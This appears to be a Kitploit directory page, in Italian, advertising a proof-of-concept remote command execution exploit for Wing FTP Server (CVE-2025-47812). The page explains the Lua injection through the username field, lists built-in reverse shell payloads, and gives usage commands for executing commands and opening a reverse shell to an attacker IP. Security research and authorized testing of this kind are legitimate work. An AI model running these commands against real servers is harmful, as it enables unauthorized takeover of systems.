Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WingFTP-CVE-2025-47812-illdeed — Exploit di Remote Command Execution per Wing FTP Server (CVE-2025-47812) | Kitploit
Strumenti/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Exploit di Remote Command Execution per Wing FTP Server (CVE-2025-47812)

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47812 - Exploit RCE per Wing FTP Server

Questo repository fornisce un proof-of-concept exploit per CVE-2025-47812, una vulnerabilità di esecuzione remota di comandi (RCE) in Wing FTP Server. Un attaccante può iniettare ed eseguire comandi di sistema arbitrari basati su Lua abusando del parametro username durante l'autenticazione, ottenendo piena esecuzione remota di codice.


📌 Caratteristiche dell'Exploit

  • 🔧 Esecuzione remota di comandi shell personalizzati
  • 🧬 Multipli payload di reverse shell integrati (bash, Python, netcat, ecc.)
  • 🪪 Estrazione automatica dell'UID da Set-Cookie
  • 📦 Registra gli UID riusciti in found_uids.txt
  • 🧪 Modalità dry-run (nessuna richiesta inviata — testa la logica di input/output in sicurezza)
  • 🔁 Logica di retry su fallimento di rete
  • 🧹 Formattazione più pulita dei payload e output leggibile
  • ✅ Validazione degli input per IP, porte e URL
  • ⚙️ Supporto per argomenti da riga di comando per flussi di lavoro automatizzati

💻 Utilizzo

Esegui un semplice comando shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Attiva una reverse shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Modalità dry-run (nessuna richiesta verrà inviata):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Modifiche apportate all'Exploit Originale

Caratteristica/MiglioramentoDescrizione
✅ Analisi degli argomentiAggiunto supporto CLI argparse per modalità non interattiva
🔐 Validazione inputAssicura URL/IP/porta validi prima di tentare l'exploit
📦 Refactoring headerEstratti gli header HTTP in una funzione riutilizzabile per coerenza
📄 Registrazione UIDSalva i token UID riusciti in found_uids.txt
🧪 Modalità Dry-RunPermette test sicuri senza inviare richieste (--dry-run)
🕒 Timeout + RetryAggiunge timeout delle richieste e tentativi automatici di retry in caso di fallimento
🧼 Leggibilità payloadRiformattata la stringa di iniezione Lua per chiarezza e manutenzione
📊 Output strutturatoRacchiuse risposte del server e info payload con delimitatori per facile lettura
⚠️ Controlli codici di statoAvvisa l'utente se il target restituisce codici di stato HTTP inaspettati
📝 Sistema di loggingSostituisce print() con il modulo Python logging per un migliore controllo della verbosità

⚠️ Disclaimer

Questo progetto è inteso esclusivamente per test di sicurezza autorizzati e a scopo educativo.
Non utilizzare questo strumento contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicito permesso di test.


Scarica lo strumento